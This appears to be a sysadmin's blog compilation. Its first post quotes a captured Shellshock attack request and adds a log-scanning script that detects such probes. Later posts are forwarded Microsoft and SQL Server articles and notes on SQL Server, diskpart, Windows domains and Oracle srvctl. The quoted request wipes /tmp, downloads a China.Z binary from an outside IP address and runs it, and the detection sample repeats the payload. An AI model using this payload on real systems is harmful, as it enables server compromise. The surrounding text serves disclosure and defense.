China.z Malware info

My prod server had a security issue; the post below shows the same case:

From: http://users.jyu.fi/~sapekiis/china-z/index.html

China.Z Malware

Among the daily attacks on my web server, I got a request for the following file (without the line breaks).

() { :; }; /bin/bash -c "
rm -rf /tmp/*;
echo wget http://121.207.230.74:911/24 -O /tmp/China.Z-rpvd >> /tmp/Run.sh;
echo echo By China.Z >> /tmp/Run.sh;
echo chmod 777 /tmp/China.Z-rpvd >> /tmp/Run.sh;
echo /tmp/China.Z-rpvd >> /tmp/Run.sh;
echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;
chmod 777 /tmp/Run.sh;
/tmp/Run.sh
"

It was clearly an attempt to exploit CVE-2014-6271 and friends, colloquially known as Shellshock or Bashdoor. That is not particularly interesting, because the bug was fixed a long time ago and my server does not even support CGI. However some searching revealed that the payload does not seem to be known.

I set up a trap and captured the payload the next time it came by. On a cursory glance it looked like a poorly-written C++ program that was compiled with a 2003 version of GCC on a RHEL machine.

I do not care to dig much deeper, so I am sharing the payload with the world in case someone does. I put the payload and the accompanying request into an archive. Note that the payload is most definitely harmful and you need to be really careful if you decide to work with it. I removed its execute bits as a precaution, but the rest is on you.

Also, you can follow these pages as a workaround guide:

1. http://www.slideshare.net/hendrikvb/chinaz-analysis-of-a-hack

2. http://blog.malwaremustdie.org/2015/01/mmd-0030-2015-new-elf-malware-on.html

3. http://blog.malwaremustdie.org/2015/06/the-elf-chinaz-reloaded.html
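
A defender's view of the request quoted above, as an added example that is not part of the original post or of the quoted page: vulnerable bash versions treated an environment value beginning with the four characters "() {" as a function definition, so in a combined-format access log the probe appears as a quoted header field that starts with them. The log lines, addresses and function names below are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example: flag Shellshock-style probes in a combined-format access log.
# The log lines are constructed samples (documentation address ranges),
# not captured traffic.
sample_log() {
cat <<'EOF'
198.51.100.7 - - [10/Jan/2015:03:12:44 +0000] "GET /cgi-bin/status HTTP/1.1" 404 162 "-" "() { :; }; /bin/bash -c \"wget http://192.0.2.10:911/24 -O /tmp/China.Z-rpvd\""
203.0.113.5 - - [10/Jan/2015:03:13:01 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.9 - - [10/Jan/2015:03:15:27 +0000] "GET / HTTP/1.1" 200 5120 "() { foo; }; echo probe" "curl/7.38.0"
203.0.113.8 - - [10/Jan/2015:03:16:02 +0000] "GET /app.js?cb=function(){} HTTP/1.1" 200 911 "-" "Mozilla/5.0"
EOF
}

# Keep only lines where a quoted field (referer, user agent) begins with "() {".
# Anchoring on the opening quote avoids matching harmless text such as
# "function(){}" inside a URL.
shellshock_hits() {
    grep -F '"() {'
}

# For each hit, print the source address and the first URL the injected
# command tries to fetch ("none" if there is no URL), for blocklists or
# further triage.
shellshock_summary() {
    shellshock_hits | while IFS= read -r line; do
        ip=${line%% *}
        url=$(printf '%s\n' "$line" | grep -oE 'https?://[^ "\\]+' | head -n 1)
        printf '%s %s\n' "$ip" "${url:-none}"
    done
}

# Stand-alone run over the constructed sample.
sample_log | shellshock_summary
```

To run it against a real log, replace sample_log with the log file, for example: shellshock_summary < access.log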

–EOF–

 

Something interesting is happening…


The world’s largest taxi company owns no vehicles; the world’s most popular media owner creates no content; the most valuable retailer has no inventory; the world’s largest accommodation provider owns no real estate.

the revolution is involving..


FW:Microsoft Announces New Container Technologies for the Next Generation Cloud

source:http://blogs.technet.com/b/server-cloud/archive/2015/04/08/microsoft-announces-new-container-technologies-for-the-next-generation-cloud.aspx

Guest post by Mike Neil, General Manager for Windows Server, Microsoft

In today’s cloud-first world, businesses increasingly rely on applications to fuel innovation and productivity. As the cloud evolves, containers are emerging as an attractive way for developers to quickly and efficiently build and deploy these applications at the speed of business. Offering developers and IT professionals the ability to deploy applications from a workstation to a server in mere seconds, containers are taking application development to a whole new level.

As developers look to expand the benefits of containers to a broader set of applications, new requirements are emerging. For example, heightened levels of trust may be required for enterprise systems or in hosted environments. Furthermore, developers often deploy into mixed operational environments where they may not have control of the platform where the application is deployed. Virtualization has historically provided a valuable level of isolation that enables these scenarios but there is now opportunity to blend the efficiency and density of the container model with the right level of isolation.

Last October, Microsoft and Docker, Inc. jointly announced plans to bring containers to developers across the Docker and Windows ecosystems via Windows Server Containers, available in the next version of Windows Server. We will be unveiling the first live demonstration in a few weeks, starting at the BUILD conference. Today, we are taking containerization one step further by expanding the scenarios and workloads developers can address with containers:

• Hyper-V Containers, a new container deployment option with enhanced isolation powered by Hyper-V virtualization 
• Nano Server, a minimal footprint installation of Windows Server that is highly optimized for the cloud, and ideal for containers.

First-of-Their-Kind Hyper-V Containers

Leveraging our deep virtualization experience, Microsoft will now offer containers with a new level of isolation previously reserved only for fully dedicated physical or virtual machines, while maintaining an agile and efficient experience with full Docker cross-platform integration. Through this new first-of-its-kind offering, Hyper-V Containers will ensure code running in one container remains isolated and cannot impact the host operating system or other containers running on the same host.

While Hyper-V containers offer an additional deployment option between Windows Server Containers and the Hyper-V virtual machine, you will be able to deploy them using the same development, programming and management tools you would use for Windows Server Containers. In addition, applications developed for Windows Server Containers can be deployed as a Hyper-V Container without modification, providing greater flexibility for operators who need to choose degrees of density, agility, and isolation in a multi-platform, multi-application environment.

Our Containers in the Docker Ecosystem

Docker plays an important part in enabling the container ecosystem across Linux, Windows Server and the forthcoming Hyper-V Containers. We have been working closely with the Docker community to leverage and extend container innovations in Windows Server and Microsoft Azure, including submitting the development of the Docker engine for Windows Server Containers as an open contribution to the Docker repository on GitHub. In addition, we’ve made it easier to deploy the latest Docker engine using Azure extensions to setup a Docker host on Azure Linux VMs and to deploy a Docker-managed VM directly from the Azure Marketplace. Finally, we’ve added integration for Swarm, Machine and Compose into Azure and Hyper-V.

“Microsoft has been a great partner and contributor to the Docker project since our joint announcement in October of 2014,” said Nick Stinemates, Head of Business Development and Technical Alliances. “They have made a number of enhancements to improve the developer experience for Docker on Azure, while making contributions to all aspects of the Docker platform including Docker orchestration tools and Docker Client on Windows. Microsoft has also demonstrated its leadership within the community by providing compelling new content like dockerized .NET for Linux. At the same time, they’ve been working to extend the benefits of Docker containers- application portability to any infrastructure and an accelerated development process–to its Windows developer community.”

Introducing Nano Server: The Nucleus of Modern Apps and Cloud

The operating system has evolved dramatically with the move to the cloud. Many customers today need their OS for the primary purpose of powering born-in-the-cloud applications. Leveraging our years of experience building and running hyper-scale datacenters, Microsoft is uniquely positioned to provide a purpose-built OS to power modern apps and containers.

The result is Nano Server, a minimal footprint installation option of Windows Server that is highly optimized for the cloud, including containers. Nano Server provides just the components you need – nothing else, meaning smaller server images, which reduces deployment times, decreases network bandwidth consumption, and improves uptime and security. This small footprint makes Nano Server an ideal complement for Windows Server Containers and Hyper-V Containers, as well as other cloud-optimized scenarios. A preview will be available in the coming weeks, and you can read more about the technology on the Windows Server blog.

Containers are bringing speed and scale to the next level in today’s cloud-first world. Microsoft is uniquely positioned to propel more organizations forward into the next era of containerization, by offering flexibility and choice through Windows Server containers, Linux containers, and Hyper-V containers both in the cloud and on-premises. Today’s announcements are just the beginning of what’s to come, as we continue to fuel both the growth of containers in the industry, and new levels of application innovation for all developers.

Stay tuned for more details on these new innovations, beginning at our BUILD conference in a few weeks.

FW:SQL Server and the “Lock pages in memory” Right in Windows Server

Here is a nice post about the “Lock pages in memory” right in Windows Server. I am just forwarding it from the source:
http://sqlserverperformance.wordpress.com/2011/02/14/sql-server-and-the-lock-pages-in-memory-right-in-windows-server/

It is pretty important to make sure you set the Max Server memory setting for SQL Server 2005/2008 to something besides the default setting (which allows SQL Server to use as much memory as it wants, subject to signals from the operating system that it is under memory pressure). This is especially important with larger, busier systems that may be under memory pressure.

This setting controls how much memory can be used by the SQL Server Buffer Pool. If you don’t set an upper limit for this value, other parts of SQL Server, and the operating system can be starved for memory, which can cause instability and performance problems. It is even more important to set this correctly if you have “Lock Pages in Memory” enabled for the SQL Server service account (which I always do for x64 systems with more than 4GB of memory)……………

Thanks to the author for the nice post

–EOF–

the “share option” in directory disappeared

I found that after a client PC was joined to a Windows domain running Windows 2003 Active Directory, the “share option” was gone when logged in as a domain user.

This happens when domain users do not have the privilege to create ordinary Windows directory shares; you need to add the domain user to the Power Users group. Even when you log in as the domain administrator, the directory still lacks the “sharing option”; add that account to the local Administrators group and the sharing option appears again.
Besides, if the domain user does not have the privilege to share the directory, you need to enable that function on the domain controller with the policy tool (gpedit.msc).

Just mark it.

–EOF–

How to determine the version and edition of SQL Server and its components

How do you determine the version and edition of SQL Server and its components? This page from the Microsoft website gives the version information:

https://support.microsoft.com/kb/321185/en-us

SQL Server 2012 version information

The following table lists the major releases of SQL Server 2012.
Release	Product Version
SQL Server 2012 Service Pack 1	11.00.3000.00
SQL Server 2012 RTM	        11.00.2100.60

SQL Server 2008 R2 version information

The following table lists the major releases of SQL Server 2008 R2.
Release	Product version
SQL Server 2008 R2 Service Pack 2	10.50.4000.0
SQL Server 2008 R2 Service Pack 1	10.50.2500.0
SQL Server 2008 R2 RTM	                10.50.1600.1

SQL Server 2008 version information

The following table lists the major releases of SQL Server 2008.
Release	Product version
SQL Server 2008 Service Pack 3	10.00.5500.00
SQL Server 2008 Service Pack 2	10.00.4000.00
SQL Server 2008 Service Pack 1	10.00.2531.00
SQL Server 2008 RTM	        10.00.1600.22

SQL Server 2005 version information

The following table lists the major releases of SQL Server 2005.
Release	Product version
SQL Server 2005 Service Pack 4	9.00.5000.00
SQL Server 2005 Service Pack 3	9.00.4035
SQL Server 2005 Service Pack 2	9.00.3042
SQL Server 2005 Service Pack 1	9.00.2047
SQL Server 2005 RTM	        9.00.1399

–EOF–

Shrink Transaction Logfile for SQL Server 2008R2

check the recovery mode of database

use master
SELECT NAME, recovery_model_desc FROM sys.databases;

change the recovery mode to simple

use master
alter database EDM_DEV set recovery simple;

locate the file name and the size of LOG file you want to shrink

use EDM_DEV
select name,size from sys.database_files;

the log is named “EDM_DEV_log”,shrink it to 1G

dbcc shrinkfile (N'EDM_DEV_log',1000)

check out the result of size of logfile,see if the size of logfile decreased

change the EDM database to full recovery mode

use master
alter database EDM_DEV set recovery full;
SELECT NAME, recovery_model_desc FROM sys.databases;

–EOF–

windows server 2008 partition extend online

Helped the customer extend an NTFS partition online to satisfy disk consumption; just noting it here.

C:\Users\Administrator>diskpart

Microsoft DiskPart 版本 6.1.7601
Copyright (C) 1999-2008 Microsoft Corporation.
在计算机上: EDM-DEV-DB

DISKPART> list volume

  卷 ###      LTR  标签         FS     类型        大小     状态       信息
 ----------  ---  -----------  -----  ----------  -------  ---------  --------
  卷     0     X                       DVD-ROM         0 B  无介质

  卷     1         系统保留    NTFS   磁盘分区         100 MB  正常     系统
  卷     2     C               NTFS   磁盘分区          29 GB  正常     启动
  卷     3     D   新加卷      NTFS   磁盘分区         109 GB  正常     页面文件

DISKPART> list volume

  卷 ###      LTR  标签         FS     类型        大小     状态       信息
  ----------  ---  -----------  -----  ----------  -------  ---------  --------
  卷     0     X                       DVD-ROM         0 B  无介质

  卷     1         系统保留     NTFS   磁盘分区         100 MB  正常    系统
  卷     2     C                NTFS   磁盘分区         29 GB  正常    启动
  卷     3     D   新加卷       NTFS   磁盘分区         109 GB  正常  页面文件

DISKPART> list

Microsoft DiskPart 版本 6.1.7601

DISK        - 显示磁盘列表。例如,LIST DISK。
PARTITION   - 显示所选磁盘上的分区列表。
              例如,LIST PARTITION。
VOLUME      - 显示卷列表。例如,LIST VOLUME。
VDISK       - 显示虚拟磁盘列表。

DISKPART> list volume

  卷 ###      LTR  标签         FS     类型        大小     状态       信息
  ----------  ---  -----------  -----  ----------  -------  ---------  --------
  卷     0     X                       DVD-ROM         0 B  无介质
  卷     1         系统保留     NTFS   磁盘分区         100 MB  正常         系统
  卷     2     C               NTFS   磁盘分区          29 GB  正常         启动
  卷     3     D   新加卷       NTFS   磁盘分区         109 GB  正常         页面文件

DISKPART> list disk

  磁盘 ###  状态           大小     可用     Dyn  Gpt
  --------  -------------  -------  -------  ---  ---
  磁盘 0    联机              450 GB   310 GB

DISKPART> select disk 0

磁盘 0 现在是所选磁盘。

DISKPART> list volume

  卷 ###      LTR  标签         FS     类型        大小     状态       信息
  ----------  ---  -----------  -----  ----------  -------  ---------  --------
  卷     0     X                       DVD-ROM         0 B  无介质
  卷     1         系统保留     NTFS   磁盘分区         100 MB  正常         系统
  卷     2     C                NTFS   磁盘分区          29 GB  正常         启动
  卷     3     D   新加卷       NTFS   磁盘分区         109 GB  正常         页面文件

DISKPART> list part

  分区 ###       类型              大小     偏移量
  -------------  ----------------  -------  -------
  分区      1    主要                 100 MB  1024 KB
  分区      2    主要                  29 GB   101 MB
  分区      3    主要                 109 GB    29 GB

DISKPART> select volume 3

卷 3 是所选卷。

DISKPART> extend 317440

为此命令指定的参数无效。
有关此命令类型的详细信息,请使用 HELP EXTEND 命令

DISKPART> extend size=317440

DiskPart 成功地扩展了卷。

DISKPART>

DISKPART> list part

  分区 ###       类型              大小     偏移量
  -------------  ----------------  -------  -------
  分区      1    主要                 100 MB  1024 KB
  分区      2    主要                  29 GB   101 MB
* 分区      3    主要                 419 GB    29 GB

–EOF–

sqlserver 2008r2 backup to the UNC share directory

I was trying to back up SQL Server 2008 R2 to a shared directory on the LAN, but kept running into errors.
I always got the error message below:
backup database testdb to “\\192.168.56.101\backup\testdb.bak”

BackupDiskFile::CreateMedia: backup device ‘z:\backup\edm.bak’ can not be created. operation system error 3(can not find the path)

I think there must be some difference between a local disk and a mapped UNC disk.

The privileges on the UNC share are OK, so I can rule that out.
It seems the root cause is the account used to start the SQL Server instance.
The SQL Server services were started by “NT AUTHORITY\SYSTEM”, which has no right to access remote resources on the LAN. If you use a domain user or any local OS account that has the privilege to access remote resources, the problem is overcome.
Finally, I changed the startup account to administrator, and the problem was solved.

Besides, it is not recommended to use the local administrator account to start the SQL Server service, because when the OS admin changes the password of the administrator account, SQL Server will fail to start as its stored password is incorrect.


–EOF–

upgrade oracle 11.2.0.3 RAC to 11.2.0.4

1. environment information

two-node RAC on ASM based on Oracle Enterprise Linux 6

crs version:11.2.0.3
rdbms version:11.2.0.3

2. precheck work
Run the script “runcluvfy.sh” to verify that the two nodes are ready for the upgrade.
You can find the script runcluvfy.sh in the grid software package.

3. prepare the directory
I will use the out-of-place upgrade, so I need to prepare the directories in advance.
The out-of-place upgrade is recommended by Oracle; prepare separate directories for the new GI home and RDBMS home.

srvctl: line xxx: /bin/java: No such file or directory

It’s quite strange: after patching with OPatch, srvctl went wrong:

[oracle@node1 bin]$ srvctl
/opt/app/oracle/product/10.2.0/db_1/bin/srvctl: line 188: /bin/java: No such file or directory

It’s different from the situation in bug 3937317.

After comparing the contents of srvctl, I found some missing values, such as:

//there should be values in “JREDIR” and “JLIBDIR”

------------------------------------------------
CHOME=/local/oracle/app/OraHome_1/crs
OHOME=/local/oracle/app/OraHome_1/db_1
if [ "X$CHOME" != "X$OHOME" ]
then
    case $ORACLE_HOME in
        "") echo "****ORACLE_HOME environment variable not set!"
            echo "    ORACLE_HOME should be set to the main"
            echo "    directory that contains Oracle products."
            echo "    Set and export ORACLE_HOME, then re-run."
            exit 1;;
    esac
else
    ORACLE_HOME=/local/oracle/app/OraHome_1/crs
    export ORACLE_HOME
fi

# External Directory Variables set by the Installer
JREDIR=/local/oracle/app/OraHome_1/db_1/jdk/jre
JLIBDIR=/local/oracle/app/OraHome_1/db_1/jlib

# jar files
-------------------------------------------------

In the srvctl where the issue happened, however, there are no values where there should be:

# External Directory Variables set by the Installer
JREDIR=
JLIBDIR=

//add the values. Attention: they are different in $ORACLE_HOME/bin/srvctl and $ORACLE_CRS_HOME/bin/srvctl
//they are different, note that!

FOR:$ORACLE_HOME/bin/srvctl

# External Directory Variables set by the Installer
JREDIR=/opt/app/oracle/product/10.2.0/db_1/jdk/jre
JLIBDIR=/opt/app/oracle/product/10.2.0/db_1/jlib

FOR:$ORACLE_CRS_HOME/bin/srvctl

# External Directory Variables set by the Installer
JREDIR=/opt/app/oracle/product/10.2.0/crs/jdk/jre
JLIBDIR=/opt/app/oracle/product/10.2.0/crs/jlib

//problem solved
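
A quick check for the condition described above, as an added example that is not Oracle's code or part of the original fix: with JREDIR empty, a java path built from it collapses to /bin/java, which is consistent with the error shown. The function name check_srvctl_vars and the demo file are assumptions made for illustration.

```shell
#!/usr/bin/env bash
# Added example: report installer variables that a patch left empty (or
# pointing at a missing directory) in an srvctl wrapper script.
# check_srvctl_vars is a hypothetical helper name.
check_srvctl_vars() {
    script=$1
    status=0
    for var in JREDIR JLIBDIR; do
        # Value of the last plain "VAR=value" assignment in the wrapper;
        # empty if the assignment is blank or absent.
        value=$(sed -n "s/^${var}=//p" "$script" | tail -n 1)
        if [ -z "$value" ]; then
            echo "$var is empty in $script"
            status=1
        elif [ ! -d "$value" ]; then
            echo "$var points to missing directory $value"
            status=1
        fi
    done
    return "$status"
}

# Constructed demo: a wrapper fragment with the empty assignments shown above.
demo_dir=$(mktemp -d)
printf '%s\n' '# External Directory Variables set by the Installer' \
    'JREDIR=' 'JLIBDIR=' > "$demo_dir/srvctl"
check_srvctl_vars "$demo_dir/srvctl" || echo "wrapper needs fixing"
rm -rf "$demo_dir"
```

Run it against both $ORACLE_HOME/bin/srvctl and $ORACLE_CRS_HOME/bin/srvctl, since each needs its own values.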
–EOF–